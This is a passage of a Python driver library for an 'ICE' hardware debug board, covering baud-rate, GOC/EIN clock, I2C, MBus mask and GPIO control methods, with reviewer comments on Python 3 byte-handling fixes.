    Internal. This function is not meant to be called directly.
    '''
    self.min_version(0.2)
    # Tell the board first, then retune our own serial port to match.
    self.send_message_until_acked('_', struct.pack("!BH", ord('b'), div))
    try:
        self.dev.baudrate = baudrate
    except IOError as e:
        if e.errno == 25:
            # errno 25 (ENOTTY): backing fd is not a real tty, e.g. a
            # socat-provided pty; the board side is already set.
            logger.warn("Failed to set baud rate (if socat, ignore)")
        else:
            raise
@min_proto_version("0.2")
@capability('_')
def ice_set_baudrate_to_115200(self):
    '''Set the ICE bridge to 115200 baud (reference divisor 0x00AE).'''
    self.ice_set_baudrate(0x00AE, 115200)

@min_proto_version("0.2")
@capability('_')
def ice_set_baudrate_to_230400(self):
    '''Set the ICE bridge to 230400 baud.'''
    # Floor division (bugfix): `0x00AE/2` is a float on Python 3 and
    # ice_set_baudrate packs the divisor with struct.pack("!H", ...),
    # which rejects non-integers.
    self.ice_set_baudrate(0x00AE // 2, 115200 * 2)

@min_proto_version("0.2")
@capability('_')
def ice_set_baudrate_to_460800(self):
    '''Set the ICE bridge to 460800 baud.'''
    # NOTE(review): 0x00AE does not divide evenly by 4/8/16; the truncated
    # divisor is the nearest integer setting -- confirm against firmware.
    self.ice_set_baudrate(0x00AE // 4, 115200 * 4)

@min_proto_version("0.2")
@capability('_')
def ice_set_baudrate_to_921600(self):
    '''Set the ICE bridge to 921600 baud.'''
    self.ice_set_baudrate(0x00AE // 8, 115200 * 8)

@min_proto_version("0.2")
@capability('_')
def ice_set_baudrate_to_1843200(self):
    '''Set the ICE bridge to 1843200 baud.'''
    self.ice_set_baudrate(0x00AE // 16, 115200 * 16)

@min_proto_version("0.2")
@capability('_')
def ice_set_baudrate_to_2000000(self):
    '''Set the ICE bridge to 2 Mbaud (dedicated divisor 0x000A).'''
    self.ice_set_baudrate(0x000A, 2000000)

@min_proto_version("0.2")
@capability('_')
def ice_set_baudrate_to_3_megabaud(self):
    '''Set the ICE bridge to 3 Mbaud (dedicated divisor 0x0007).'''
    self.ice_set_baudrate(0x0007, 3000000)
## GOC VS EIN HANDLING ##
def set_goc_ein(self, goc=0, ein=0, restore_clock_freq=True):
    # Select the optical (GOC) or wired (EIN) programming frontend.
    # Exactly one of `goc`/`ein` must be truthy.  The two frontends share
    # one clock divider on the board, so the active mode's divisor is
    # stashed before switching and the other mode's divisor is restored.
    if goc == ein:
        raise self.ICE_Error("Internal consistency goc vs ein failure")
    if self.minor == 1:
        # Protocol 0.1 hardware only has GOC: selecting GOC is a no-op,
        # selecting EIN is an error.
        if goc == 1:
            return
        else:
            raise self.ICE_Error("Attempt to call set_goc_ein for ein with protocol version 1")
    if ein:
        # Set to EIN mode
        if self.goc_ein_toggle == 0:
            # Already in ein mode, nothing to do
            return
        if self.goc_ein_toggle == 1:
            # If we were set to GOC mode, capture the clock frequency
            self.goc_freq_divisor = self.goc_ein_get_freq_divisor()
        if restore_clock_freq:
            try:
                self.goc_ein_set_freq_divisor(self.ein_freq_divisor)
                logger.debug("Restored previous EIN clock frequency")
            except AttributeError:
                # No EIN divisor saved yet -- fall back to the default.
                self.goc_ein_set_freq_divisor(self.EIN_DEFAULT_DIVISOR)
                logger.debug("Set EIN to default clock frequency")
        self.send_message_until_acked('o', struct.pack("BB", ord('p'), 0))
        self.goc_ein_toggle = 0
        logger.debug("Set goc/ein toggle to ein")
    else:
        # Set to GOC mode
        if self.goc_ein_toggle == 1:
            # Already in goc mode, nothing to do.
            return
        if self.goc_ein_toggle == 0:
            # Leaving EIN mode: remember its divisor for next time.
            self.ein_freq_divisor = self.goc_ein_get_freq_divisor()
        if restore_clock_freq:
            try:
                self.goc_ein_set_freq_divisor(self.goc_freq_divisor)
                logger.debug("Restored previous GOC clock frequency")
            except AttributeError:
                self.goc_ein_set_freq_divisor(self._goc_freq_in_hz_to_divisor(self.GOC_SPEED_DEFAULT_HZ))
                logger.debug("Set GOC to default clock frequency")
        self.send_message_until_acked('o', struct.pack("BB", ord('p'), 1))
        self.goc_ein_toggle = 1
        logger.debug("Set goc/ein toggle to goc")
@max_proto_version("0.2")
def goc_ein_get_freq_divisor_max_0_2(self):
    '''Read the GOC/EIN clock divisor (3-byte wire format, protocol <= 0.2).'''
    resp = self.send_message_until_acked('O', struct.pack("B", ord('c')))
    if len(resp) != 3:
        raise self.FormatError("Wrong response length from `Oc': " + str(resp))
    # Bugfix: pad with a BYTES literal.  `"\x00" + resp` concatenated str
    # with bytes and raised TypeError on Python 3; b"\x00" widens the
    # 3-byte reply to a 4-byte big-endian unsigned int ("!I") field.
    setting = struct.unpack("!I", b"\x00" + resp)[0]
    return setting

@min_proto_version("0.3")
def goc_ein_get_freq_divisor_min_0_3(self):
    '''Read the GOC/EIN clock divisor (4-byte wire format, protocol >= 0.3).'''
    resp = self.send_message_until_acked('O', struct.pack("B", ord('c')))
    if len(resp) != 4:
        raise self.FormatError("Wrong response length from `Oc': " + str(resp))
    setting = struct.unpack("!I", resp)[0]
    logger.debug('got divisor value {}'.format(setting))
    return setting

def goc_ein_get_freq_divisor(self):
    '''Dispatch to the divisor reader matching the negotiated protocol.'''
    if self.minor > 2:
        return self.goc_ein_get_freq_divisor_min_0_3()
    else:
        return self.goc_ein_get_freq_divisor_max_0_2()
@max_proto_version("0.2")
def goc_ein_set_freq_divisor_max_0_2(self, divisor):
    '''Write the GOC/EIN clock divisor (3-byte wire format, protocol <= 0.2).'''
    # int() first: the divisor frequently arrives as a float (see
    # _goc_freq_in_hz_to_divisor) and struct.pack("!I", ...) rejects
    # floats on Python 3.  Truncation matches the old Python 2 coercion.
    packed = struct.pack("!I", int(divisor))
    # Bugfix: compare a one-byte SLICE against a bytes literal.  The old
    # `packed[0] != '\x00'` compared an int with a str on Python 3, was
    # therefore always true, and rejected every divisor as out of range.
    if packed[0:1] != b'\x00':
        raise self.ParameterError("Out of range.")
    msg = struct.pack("B", ord('c')) + packed[1:]
    self.send_message_until_acked('o', msg)

@min_proto_version("0.3")
def goc_ein_set_freq_divisor_min_0_3(self, divisor):
    '''Write the GOC/EIN clock divisor (4-byte wire format, protocol >= 0.3).'''
    logger.debug('set divisor to {}'.format(divisor))
    packed = struct.pack("!I", int(divisor))  # int(): see the max_0_2 variant
    msg = struct.pack("B", ord('c')) + packed
    self.send_message_until_acked('o', msg)

def goc_ein_set_freq_divisor(self, divisor):
    '''Dispatch to the divisor writer matching the negotiated protocol.'''
    if self.minor > 2:
        return self.goc_ein_set_freq_divisor_min_0_3(divisor)
    else:
        return self.goc_ein_set_freq_divisor_max_0_2(divisor)
## GOC ##
# Default GOC blink rate in Hz -- optical programming is very slow.
GOC_SPEED_DEFAULT_HZ = .625

def _goc_display_delay(self, msg, event):
    # Progress ticker for goc_send: prints a once-per-second countdown that
    # approximates how long the board needs to blink `msg` out (one bit per
    # clock cycle), stopping early when `event` is set by the sender.
    try:
        freq = self.goc_freq
    except AttributeError:
        # Frequency never set explicitly; assume the library default.
        freq = ICE.GOC_SPEED_DEFAULT_HZ
    num_bits = len(msg) * 8
    t = num_bits / freq  # estimated transmission time in seconds
    logger.info("Sleeping for %f seconds while it blinks..." % (t))
    while (t > 1):
        # Blank the line, then rewrite the remaining-time estimate in place.
        sys.stdout.write("\r\t\t\t\t\t\t")
        sys.stdout.write("\r\t%f remaining..." % (t))
        sys.stdout.flush()
        t -= 1
        if event.is_set():
            # Sender finished early; stop counting down.
            return
        time.sleep(1)
    time.sleep(t)
@min_proto_version("0.1")
@capability('f')
def goc_send(self, msg, show_progress=True):
    '''
    Blinks a message via GOC.

    Takes a raw byte stream (e.g. "0xaa".decode('hex')).
    Returns the number of bytes actually sent.

    Long messages may be fragmented between the ICE library and the ICE
    FPGA. These fragments will be combined on the ICE board, and given the
    significantly lower bandwidth of the GOC interface, there should be no
    interruption in message transmission.
    '''
    self.set_goc_ein(goc=1)
    if show_progress:
        # Run the countdown printer on a side thread while fragments upload;
        # setting `e` stops it as soon as the upload completes.
        e = threading.Event()
        t = threading.Thread(target=self._goc_display_delay, args=(msg,e))
        t.daemon = True
        t.start()
        ret = self._fragment_sender('f', msg)
        e.set()
        t.join()
    else:
        ret = self._fragment_sender('f', msg)
    return ret
@min_proto_version("0.1")
@capability('O')
def goc_get_frequency(self):
    '''
    Gets the GOC frequency.
    '''
    self.set_goc_ein(goc=1)
    if self.minor == 3:
        # Firmware workaround: v0.3 boards report a bad divisor, so prefer
        # the value cached by goc_set_frequency when we have one.
        logger.warn('ICE Firmware v0.3 reports wrong goc freq value.'\
                ' Returning cached value.')
        try:
            return self.goc_freq
        except AttributeError:
            logger.warn('No cached value. Querying ICE. Value is junk')
    setting = self.goc_ein_get_freq_divisor()
    # Reference clock: 2 MHz on v0.1 hardware, 4 MHz afterwards.
    if self.minor == 1:
        NOMINAL = 2e6
    else:
        NOMINAL = 4e6
    freq_in_hz = NOMINAL / setting
    return freq_in_hz
def _goc_freq_in_hz_to_divisor(self, freq_in_hz):
if self.minor == 1:
NOMINAL = 2e6
else:
NOMINAL = 4e6
return NOMINAL / freq_in_hz;
@min_proto_version("0.1")
@capability('o')
def goc_set_frequency(self, freq_in_hz):
    '''
    Sets the GOC frequency.
    '''
    self.set_goc_ein(goc=1)
    # Send a 3-byte value N, where 2 MHz / N == clock speed
    self.goc_ein_set_freq_divisor(self._goc_freq_in_hz_to_divisor(freq_in_hz))
    # Cache for goc_get_frequency (v0.3 firmware reports bad values).
    self.goc_freq = freq_in_hz
    logger.debug("GOC frequency set to %f" % (freq_in_hz))
@min_proto_version("0.2")
@capability('O')
def goc_get_onoff(self):
    '''
    Get the current ambient GOC power.

    Returns True when the GOC light is currently on.
    '''
    self.set_goc_ein(goc=1)
    self.min_version(0.2)
    resp = self.send_message_until_acked('O', struct.pack("B", ord('o')))
    if len(resp) != 1:
        raise self.FormatError("Wrong response length from `Oo': " + str(resp))
    onoff = struct.unpack("B", resp)[0]
    return bool(onoff)
@min_proto_version("0.2")
@capability('o')
def goc_set_onoff(self, onoff):
    '''
    Turn the GOC light on or off.

    The GOC will blink as normal when goc_send is called, this simply sets
    the state of the GOC light when it's not doing anything else (e.g. so
    you can leave the light on for charging or something similar)
    '''
    self.set_goc_ein(goc=1)
    self.min_version(0.2)
    # onoff packs as 0/1 in the second byte of the 'o'/'o' command.
    msg = struct.pack("BB", ord('o'), onoff)
    self.send_message_until_acked('o', msg)
## I2C ##
@min_proto_version("0.1")
@capability('d')
def i2c_send(self, addr, data):
    '''
    Sends an I2C message.

    Addr should be a single byte address.
    Data should be packed binary data, as returned by struct.pack

    The return value is the number of bytes actually sent *including the
    address byte*.

    Long messages may be fragmented between the ICE library and the ICE
    FPGA. On the I2C wire, this will appear as windows of time where the I2C
    clock is stretched for a period of time. A faster baud rate between the
    PC host and the ICE FPGA will help mitigate this.
    '''
    # Address byte travels as the first payload byte of the 'd' stream.
    msg = struct.pack("B", addr) + data
    return self._fragment_sender('d', msg)
@min_proto_version("0.1")
@capability('I')
def i2c_get_speed(self):
    '''
    Get the clock speed of the ICE I2C driver in kHz.
    '''
    ack,msg = self.send_message('I', struct.pack("B", ord('c')))
    if ack == 0:
        if len(msg) != 1:
            raise self.FormatError
        # The board stores speed/2 in one byte (see i2c_set_speed).
        return struct.unpack("B", msg)[0] * 2
    # NAK path: first payload byte is an errno-style status code.
    ret = ord(msg[0])
    msg = msg[1:]
    if ret == errno.ENODEV:
        # XXX Generalize me w.r.t. version?
        # Query unsupported on this board; 100 kHz is the fixed default.
        return 100
    else:
        raise self.ICE_Error("Unknown Error")
@min_proto_version("0.1")
@capability('i')
def i2c_set_speed(self, speed):
    '''
    Set the clock speed of the ICE I2C driver in kHz.

    The accepted range of speeds is [2,400] kHz with steps of undefined
    increments. The actual set speed is returned.

    Raises an ICE_Error if the speed was not set.

    Note: This does *NOT* affect the clock speed of any M3 I2C drivers.
          That requires sending DMA messages to each of the M3 I2C
          controllers that you would like to change the speed of.
    '''
    # Clamp into the supported window.
    if speed < 2:
        speed = 2
    elif speed > 400:
        speed = 400
    # The board stores speed/2 in one byte (see i2c_get_speed).
    # Bugfix: floor division -- `speed /= 2` produces a float on Python 3
    # and struct.pack("BB", ...) rejects non-integer arguments.
    speed //= 2
    # NOTE(review): on success this returns the *halved* value, while
    # i2c_get_speed returns stored*2 -- looks inconsistent, but the
    # original behavior is preserved; confirm intent before changing.
    ack,msg = self.send_message('i', struct.pack("BB", ord('c'), speed))
    if ack == 0:
        return speed
    # NAK path: first payload byte is an errno-style status code.
    ret = ord(msg[0])
    msg = msg[1:]
    if ret == errno.EINVAL:
        raise self.ICE_Error("ICE reports: Invalid argument.")
    elif ret == errno.ENODEV:
        raise self.ICE_Error("Changing I2C speed not supported.")
@min_proto_version("0.1")
@capability('I')
def i2c_get_address(self):
    '''
    Get the I2C address(es) of the ICE peripheral.

    Returns None when address matching is disabled (both masks 0xff),
    otherwise the mask string produced by masks_to_strings.
    '''
    resp = self.send_message_until_acked('I', struct.pack("B", ord('a')))
    if len(resp) != 2:
        raise self.FormatError("i2c address response should be 2 bytes")
    # Two 8-bit masks: bits that must be 1 and bits that must be 0.
    ones, zeros = struct.unpack("BB", resp)
    if ones == 0xff and zeros == 0xff:
        # All-ones in both masks is the sentinel for "disabled".
        return None
    else:
        return self.masks_to_strings(ones, zeros, 8)

@min_proto_version("0.1")
@capability('i')
def i2c_set_address(self, address=None):
    '''
    Set the I2C address(es) of the ICE peripheral.

    The ICE board will ACK messages sent to any address that matches the
    mask set by this function. The special character 'x' is used to signify
    don't-care bits. As example, to pretend to be the DSP layer:
        address = "1001 100x"
    Spaces are permitted and ignored. To disable this feature, set the
    address to None.

    Default Value: DISABLED.
    '''
    if address is None:
        # Sentinel: both masks all-ones disables address matching.
        ones, zeros = (0xff, 0xff)
    else:
        if len(address) != 8:
            raise self.FormatError("Address must be exactly 8 bits")
        ones, zeros = self.string_to_masks(address)
    self.send_message_until_acked('i', struct.pack("BBB", ord('a'), ones, zeros))
## MBus ##
@min_proto_version("0.2")
@capability('b')
def mbus_send(self, addr, data):
    '''
    Sends an MBus message.

    Addr may be a short address or long address. In either case, it should
    be packed binary data (e.g. struct.pack or 'a5'.decode('hex'))
    Data should be packed binary data, as returned by struct.pack

    The return value is the number of bytes actually sent *including four
    bytes for the address, regardless of whether a short or long address was
    actually sent*.

    Long messages may be fragmented between the ICE library and the ICE
    FPGA. On the wire, this should not be noticeable as the PC<-->ICE bridge
    is much faster than the MBus. If this is an issue, you must keep the
    transaction size below the ICE fragmentation limit (less than 255 bytes
    for combined address + data).
    '''
    self.min_version(0.2)
    if len(addr) > 4:
        raise self.FormatError("Address too long")
    # Left-pad short addresses out to a full 4-byte address word.
    # NOTE(review): the '\x00' pad assumes addr is a str (Python 2);
    # with Python 3 bytes this concatenation raises TypeError -- confirm.
    while len(addr) < 4:
        addr = '\x00' + addr
    msg = addr + data
    return self._fragment_sender('b', msg)
@min_proto_version("0.3")
@capability('m')
def mbus_set_internal_reset(self, assert_reset):
    '''
    Control signal that holds ICE internal MBus in reset.

    While in reset, the COUT and DOUT signals are held high. This is useful
    for bootstrapping when multiple ICE boards are in a loop.

    :param assert_reset: truthy asserts reset, falsy releases it.
    '''
    self.min_version(0.3)
    # Payload: sub-command 'r' plus a single boolean flag byte.
    payload = struct.pack("BB", ord('r'), bool(assert_reset))
    self.send_message_until_acked('m', payload)
@min_proto_version("0.2")
@capability('m')
def mbus_set_full_prefix(self, prefix=None):
    '''
    Set the full prefix(es) of the ICE peripheral.

    The ICE board will ACK messages sent to any address that matches the
    mask set by this function. The special character 'x' is used to signify
    don't-care bits.
    Spaces are permitted and ignored. To disable this feature, set the
    address to None.

    Default Value: DISABLED.
    '''
    self.min_version(0.2)
    if prefix is None:
        # All-ones masks are the sentinel for "disabled".
        ones, zeros = (0xfffff, 0xfffff)
    else:
        if len(prefix) != 20:
            raise self.FormatError("Prefix must be exactly 20 bits")
        ones, zeros = self.string_to_masks(prefix)
    # The 20-bit prefix occupies the upper bits of a 24-bit field on the
    # wire, hence the shift by 4 before packing 3 bytes per mask.
    ones <<= 4
    zeros <<= 4
    self.send_message_until_acked('m', struct.pack("B"*(1+6),
        ord('l'),
        (ones >> 16) & 0xff,
        (ones >> 8) & 0xff,
        ones & 0xff,
        (zeros >> 16) & 0xff,
        (zeros >> 8) & 0xff,
        zeros & 0xff,
        ))

@min_proto_version("0.2")
@capability('M')
def mbus_get_full_prefix(self):
    '''
    Get the full prefix(es) set for ICE.

    Returns None when matching is disabled, otherwise the mask string
    produced by masks_to_strings.
    '''
    self.min_version(0.2)
    resp = self.send_message_until_acked('M', struct.pack("B", ord('l')))
    if len(resp) != 6:
        raise self.FormatError("Full prefix response should be 6 bytes")
    # Reassemble each 24-bit big-endian mask from its 3 bytes.
    o_hig, o_mid, o_low, z_hig, z_mid, z_low = struct.unpack("BBBBBB", resp)
    ones = o_low | o_mid << 8 | o_hig << 16
    zeros = z_low | z_mid << 8 | z_hig << 16
    # Undo the 4-bit alignment applied by mbus_set_full_prefix.
    ones >>= 4
    zeros >>= 4
    if ones == 0xfffff and zeros == 0xfffff:
        return None
    else:
        return self.masks_to_strings(ones, zeros, 20)
@min_proto_version("0.2")
@capability('m')
def mbus_set_short_prefix(self, prefix=None):
    '''
    Set the short prefix(es) of the ICE peripheral.

    Default Value: DISABLED.
    '''
    self.min_version(0.2)
    if prefix is None:
        # All-ones masks are the sentinel for "disabled".
        ones, zeros = (0xf, 0xf)
    else:
        if len(prefix) != 4:
            raise self.FormatError("Prefix must be exactly 4 bits")
        ones, zeros = self.string_to_masks(prefix)
    # NOTE(review): `zeros` is computed above but never transmitted, yet
    # mbus_get_short_prefix reads back TWO bytes (ones and zeros). This
    # looks like a dropped argument -- confirm against the ICE wire
    # protocol before relying on don't-care bits in short prefixes.
    self.send_message_until_acked('m', struct.pack("B"*(1+1),
        ord('s'),
        ones,
        ))

@min_proto_version("0.2")
@capability('M')
def mbus_get_short_prefix(self):
    '''
    Get the short prefix(es) set for ICE.

    Returns None when matching is disabled, otherwise the mask string
    produced by masks_to_strings.
    '''
    self.min_version(0.2)
    resp = self.send_message_until_acked('M', struct.pack("B", ord('s')))
    if len(resp) != 2:
        raise self.FormatError("Full prefix response should be 2 bytes")
    ones, zeros = struct.unpack("BB", resp)
    # The 4-bit values arrive in the high nibble of each byte.
    ones >>= 4
    zeros >>= 4
    if ones == 0xf and zeros == 0xf:
        return None
    else:
        return self.masks_to_strings(ones, zeros, 4)
@min_proto_version("0.3")
@capability('m')
def mbus_set_snoop(self, enable, filter_prefix=None):
    '''
    Enable or disable snooping of all MBus traffic.

    The optional filter would run in software to limit reported messages,
    but it is not implemented yet.

    Default Value: DISABLED.
    '''
    self.min_version(0.3)
    if filter_prefix is not None:
        # Software-side message filtering has not been written yet.
        raise NotImplementedError
    payload = struct.pack("BB", ord('S'), bool(enable))
    self.send_message_until_acked('m', payload)
@min_proto_version("0.3")
@capability('M')
def mbus_get_snoop(self, return_filter=False):
    '''
    Return whether snooping is enabled.

    Raises FormatError if the response is not exactly 1 byte, and
    NotImplementedError if return_filter is requested (no filter support).
    '''
    self.min_version(0.3)
    resp = self.send_message_until_acked('M', struct.pack("B", ord('S')))
    if len(resp) != 1:
        raise self.FormatError("Snoop enabled response should be 1 byte")
    # BUG FIX: struct.unpack returns a tuple, and bool() of a non-empty
    # tuple is always True -- the original reported snooping as enabled
    # even when the flag byte was 0. Index into the tuple first.
    enabled = bool(struct.unpack("B", resp)[0])
    if return_filter:
        raise NotImplementedError
    return enabled
@min_proto_version("0.2")
@capability('m')
def mbus_set_broadcast_channel_mask(self, mask=None):
    '''
    Set the broadcast mask for ICE board.

    The ICE board will report and ACK any messages sent to broadcast
    channels that match the mask set by this function. The special character 'x' is
    used to signify don't-care bits.
    Spaces are permitted and ignored. To disable this feature, set the
    address to None.

    Default Value: DISABLED.
    '''
    self.min_version(0.2)
    if mask is None:
        # All-ones masks are the sentinel for "disabled".
        ones, zeros = (0xf, 0xf)
    else:
        if len(mask) != 4:
            raise self.FormatError("Prefix must be exactly 4 bits")
        ones, zeros = self.string_to_masks(mask)
    self.send_message_until_acked('m', struct.pack("B"*(1+2),
        ord('b'),
        ones,
        zeros,
        ))

@min_proto_version("0.2")
@capability('M')
def mbus_get_broadcast_channel_mask(self):
    '''
    Get the broadcast mask for ICE.

    Returns None when matching is disabled, otherwise the mask string.
    '''
    self.min_version(0.2)
    resp = self.send_message_until_acked('M', struct.pack("B", ord('b')))
    if len(resp) != 2:
        raise self.FormatError("Broadcast mask response should be 2 bytes")
    ones, zeros = struct.unpack("BB", resp)
    if ones == 0xf and zeros == 0xf:
        return None
    else:
        return self.masks_to_strings(ones, zeros, 4)

@min_proto_version("0.2")
@capability('m')
def mbus_set_broadcast_channel_snoop_mask(self, mask=None):
    '''
    Set the broadcast snoop mask for ICE board.

    The ICE board will report, but not ACK, any messages sent to broadcast
    channels that match the mask set by this function. The special character 'x' is
    used to signify don't-care bits.
    Spaces are permitted and ignored. To disable this feature, set the
    address to None.

    Default Value: DISABLED.
    '''
    self.min_version(0.2)
    if mask is None:
        ones, zeros = (0xf, 0xf)
    else:
        if len(mask) != 4:
            raise self.FormatError("Prefix must be exactly 4 bits")
        ones, zeros = self.string_to_masks(mask)
    # 'B' (capital) selects the snoop variant of the broadcast command.
    self.send_message_until_acked('m', struct.pack("B"*(1+2),
        ord('B'),
        ones,
        zeros,
        ))

@min_proto_version("0.2")
@capability('M')
def mbus_get_broadcast_channel_snoop_mask(self):
    '''
    Get the broadcast snoop mask for ICE.

    Returns None when matching is disabled, otherwise the mask string.
    '''
    self.min_version(0.2)
    resp = self.send_message_until_acked('M', struct.pack("B", ord('B')))
    if len(resp) != 2:
        raise self.FormatError("Broadcast mask response should be 2 bytes")
    ones, zeros = struct.unpack("BB", resp)
    if ones == 0xf and zeros == 0xf:
        return None
    else:
        return self.masks_to_strings(ones, zeros, 4)
@min_proto_version("0.2")
@capability('M')
def mbus_get_master_onoff(self):
    '''
    Get whether ICE is acting as MBus master node.

    Returns a boolean, master=True.
    '''
    self.min_version(0.2)
    resp = self.send_message_until_acked('M', struct.pack("B", ord('m')))
    if len(resp) != 1:
        raise self.FormatError("Wrong response length from `Mm': " + str(resp))
    onoff = struct.unpack("B", resp)[0]
    return bool(onoff)

@min_proto_version("0.2")
@capability('m')
def mbus_set_master_onoff(self, onoff):
    '''
    Set whether ICE acts as MBus master node.

    DEFAULT: OFF
    '''
    self.min_version(0.2)
    msg = struct.pack("BB", ord('m'), onoff)
    self.send_message_until_acked('m', msg)

@min_proto_version("0.2")
@capability('M')
def mbus_get_clock(self):
    '''
    Get ICE MBus clock speed. Only meaningful if ICE is MBus master.

    Not implemented yet -- always raises NotImplementedError.
    '''
    self.min_version(0.2)
    raise NotImplementedError
    #resp = self.send_message_until_acked('M', struct.pack("B", ord('c')))
    #if len(resp) != 1:
    #    raise self.FormatError, "Wrong response length from `Mc': " + str(resp)
    #onoff = struct.unpack("B", resp)[0]
    #return bool(onoff)
    #return resp

@min_proto_version("0.2")
@capability('m')
def mbus_set_clock(self, clock_speed):
    '''
    Set ICE MBus clock speed. Only meaningful if ICE is MBus master.
    DEFAULT: XXX

    Not implemented yet -- always raises NotImplementedError.
    '''
    self.min_version(0.2)
    #msg = struct.pack("BB", ord('c'), onoff)
    #self.send_message_until_acked('m', msg)
    raise NotImplementedError
@min_proto_version("0.2")
@capability('M')
def mbus_get_should_interrupt(self):
    '''
    Get ICE MBus should interrupt setting.

    Returns the raw setting byte as an int.
    TODO: Fix interface (enums?)
    '''
    self.min_version(0.2)
    resp = self.send_message_until_acked('M', struct.pack("B", ord('i')))
    # NOTE(review): ord() on the full response assumes a 1-byte str
    # (Python 2); on Python 3 bytes this raises TypeError -- confirm.
    resp = ord(resp)
    #if len(resp) != 1:
    #    raise self.FormatError, "Wrong response length from `Mc': " + str(resp)
    #onoff = struct.unpack("B", resp)[0]
    #return bool(onoff)
    return resp

@min_proto_version("0.2")
@capability('m')
def mbus_set_should_interrupt(self, should_interrupt):
    '''
    Set ICE MBus should interrupt setting.

    DEFAULT: Off
    '''
    self.min_version(0.2)
    msg = struct.pack("BB", ord('i'), should_interrupt)
    self.send_message_until_acked('m', msg)

@min_proto_version("0.2")
@capability('M')
def mbus_get_use_priority(self):
    '''
    Get ICE MBus use priority setting.

    Returns the raw setting byte as an int.
    TODO: Fix interface (enums?)
    '''
    self.min_version(0.2)
    resp = self.send_message_until_acked('M', struct.pack("B", ord('p')))
    # NOTE(review): same Python 2 ord() assumption as above -- confirm.
    resp = ord(resp)
    #if len(resp) != 1:
    #    raise self.FormatError, "Wrong response length from `Mc': " + str(resp)
    #onoff = struct.unpack("B", resp)[0]
    #return bool(onoff)
    return resp

@min_proto_version("0.2")
@capability('m')
def mbus_set_use_priority(self, use_priority):
    '''
    Set ICE MBus use priority setting.

    DEFAULT: Off
    '''
    self.min_version(0.2)
    msg = struct.pack("BB", ord('p'), use_priority)
    self.send_message_until_acked('m', msg)
## EIN DEBUG ##
# Default clock divisor for the EIN debug port.
EIN_DEFAULT_DIVISOR = 0xFA0

@min_proto_version("0.2")
@capability('f')
def ein_send(self, msg):
    '''
    Sends a message via the EIN Debug port.

    Takes a raw byte stream (e.g. "0xaa".decode('hex')).
    Returns the number of bytes actually sent.

    Long messages may be fragmented between the ICE library and the ICE
    FPGA. These fragments will be combined on the ICE board. There should be
    no interruption in message transmission.
    '''
    # Route the shared GOC/EIN output to EIN before sending.
    self.set_goc_ein(ein=1)
    self.min_version(0.2)
    ret = self._fragment_sender('f', msg)
    return ret
## GPIO ##
# XXX TODO XXX: parameter based method version selection
# Pin direction constants shared by all gpio_* methods.
GPIO_INPUT = 0
GPIO_OUTPUT = 1
GPIO_TRISTATE = 2

def gpio_get_level(self, gpio_idx):
    '''
    Query whether a gpio is high or low. (high=True)
    '''
    # Dispatch on self.minor (presumably the negotiated protocol minor
    # version -- confirm): 0.1 addressed pins individually, 0.2+ reads
    # the whole bank and masks one pin.
    if self.minor == 1:
        return self.gpio_get_level_0_1(gpio_idx)
    else:
        return self.gpio_get_level_0_2(gpio_idx)

def gpio_get_direction(self, gpio_idx):
    '''
    Query gpio pin setup.

    Returns one of:
        ICE.GPIO_INPUT
        ICE.GPIO_OUTPUT
        ICE.GPIO_TRISTATE
    '''
    # Version dispatch, same scheme as gpio_get_level.
    if self.minor == 1:
        return self.gpio_get_direction_0_1(gpio_idx)
    else:
        return self.gpio_get_direction_0_2(gpio_idx)

def gpio_set_level(self, gpio_idx, level):
    '''
    Set gpio level. (high=True)
    '''
    if self.minor == 1:
        return self.gpio_set_level_0_1(gpio_idx, level)
    else:
        return self.gpio_set_level_0_2(gpio_idx, level)

def gpio_set_direction(self, gpio_idx, direction):
    '''
    Setup a GPIO pin.
    '''
    # Validate before dispatching so both protocol paths get the check.
    if direction not in (ICE.GPIO_INPUT, ICE.GPIO_OUTPUT, ICE.GPIO_TRISTATE):
        raise self.ParameterError("Unknown direction: " + str(direction))
    if self.minor == 1:
        return self.gpio_set_direction_0_1(gpio_idx, direction)
    else:
        return self.gpio_set_direction_0_2(gpio_idx, direction)
@min_proto_version("0.1")
@max_proto_version("0.1")
@capability('G')
def gpio_get_level_0_1(self, gpio_idx):
    '''Protocol 0.1 implementation of gpio_get_level (per-pin query).'''
    resp = self.send_message_until_acked('G',
            struct.pack('BB', ord('l'), gpio_idx))
    if len(resp) != 1:
        raise self.FormatError("Too long of a response from `Gl#':" + str(resp))
    return bool(struct.unpack("B", resp)[0])

@min_proto_version("0.1")
@max_proto_version("0.1")
@capability('G')
def gpio_get_direction_0_1(self, gpio_idx):
    '''Protocol 0.1 implementation of gpio_get_direction (per-pin query).'''
    resp = self.send_message_until_acked('G',
            struct.pack('BB', ord('d'), gpio_idx))
    if len(resp) != 1:
        raise self.FormatError("Too long of a response from `Gd#':" + str(resp))
    direction = struct.unpack("B", resp)[0]
    # Sanity-check the byte against the known direction constants.
    if direction not in (ICE.GPIO_INPUT, ICE.GPIO_OUTPUT, ICE.GPIO_TRISTATE):
        raise self.FormatError("Unknown direction: " + str(direction))
    return direction

@min_proto_version("0.1")
@max_proto_version("0.1")
@capability('g')
def gpio_set_level_0_1(self, gpio_idx, level):
    '''Protocol 0.1 implementation of gpio_set_level (per-pin write).'''
    self.send_message_until_acked('g',
            struct.pack('BBB', ord('l'), gpio_idx, level))

@min_proto_version("0.1")
@max_proto_version("0.1")
@capability('g')
def gpio_set_direction_0_1(self, gpio_idx, direction):
    '''Protocol 0.1 implementation of gpio_set_direction (per-pin write).'''
    self.send_message_until_acked('g',
            struct.pack('BBB', ord('d'), gpio_idx, direction))
def _gpio_get_level_0_2(self):
    # Read the full 24-bit GPIO level bank; response is 3 bytes,
    # most-significant first.
    resp = self.send_message_until_acked('G', struct.pack('B', ord('l')))
    if len(resp) != 3:
        raise self.FormatError("Bad response from `Gl':" + str(resp))
    # NOTE(review): map(ord, ...) assumes resp is a str (Python 2); on
    # Python 3 bytes, iteration already yields ints and ord() raises
    # TypeError -- confirm the target interpreter.
    high,mid,low = list(map(ord, resp))
    return low | (mid << 8) | (high << 16)

@min_proto_version("0.2")
@capability('G')
def gpio_get_level_0_2(self, gpio_idx):
    '''Protocol 0.2 implementation of gpio_get_level (24-pin bank read).'''
    if gpio_idx >= 24:
        raise self.ParameterError("Request for illegal gpio idx")
    # Extract the single requested pin from the full bank.
    return (self._gpio_get_level_0_2() >> gpio_idx) & 0x1

def _gpio_get_direction_0_2(self):
    # Read the full 24-bit GPIO direction bank (same layout as levels).
    resp = self.send_message_until_acked('G', struct.pack('B', ord('d')))
    if len(resp) != 3:
        raise self.FormatError("Bad response from `Gd#':" + str(resp))
